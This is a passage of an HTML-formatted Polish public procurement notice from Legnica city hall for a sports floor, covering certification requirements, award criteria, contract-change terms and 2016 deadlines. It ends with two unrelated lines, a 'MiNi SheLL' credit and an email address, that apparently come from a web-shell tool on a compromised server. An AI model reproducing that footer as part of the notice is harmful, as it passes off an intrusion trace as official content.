13. Oświadczenie Wykonawcy dotyczące oferowanej podłogi sportowej- wg załącznika nr 11  do Instrukcji dla Wykonawców- Rozdział nr 2 siwz wraz z  poniższymi załącznikami: 
1)	Atest Higieniczny -  świadectwo informujące, iż wyrób (podłoga sportowa) podczas stosowania zgodnego z zaleceniami producenta, nie wpływa negatywnie na zdrowie i środowisko,
2)	Certyfikat Zgodności z obowiązującą normą PN-EN 14904:2009 /ze wszystkimi kryteriami normy/ wydany przez Instytut Techniki Budowlanej lub inny uprawniony organ dla całego systemu podłogi sportowej (konstrukcja podłogi wraz z wykładziną sportową).
3)	Autoryzację producenta dla całej (systemowej) podłogi sportowej.
4)	Klasyfikację w zakresie reakcji na ogień dla całego systemu podłogi sportowej (konstrukcja+ wykładzina) - Cfl-s1 
5)	przynajmniej jeden z poniższych certyfikatów międzynarodowych związków sportowych: 
- Certyfikat EHF /Europejski Związek Piłki Ręcznej/ 
- Certyfikat FIVB /Międzynarodowy Związek Piłki Siatkowej/ 
- Certyfikat IHF /Międzynarodowy Związek Piłki Ręcznej/</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin realizacji- skrócenie terminu realizacji w stosunku do 26.08.2016r.  - ilość dni - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z zapisami załącznika WARUNKI ZMIAN W UMOWIE - załącznik nr 5 do Instrukcji dla Wykonawców- Rozdział 2 siwz.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.bip.legnica.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Legnica, Plac Słowiański 7 , pokój nr 22- Referat Zamówień  Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2016 godzina 12:09, miejsce: Urząd Miasta Legnica, Plac Słowiański 8 , pokój nr 208.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com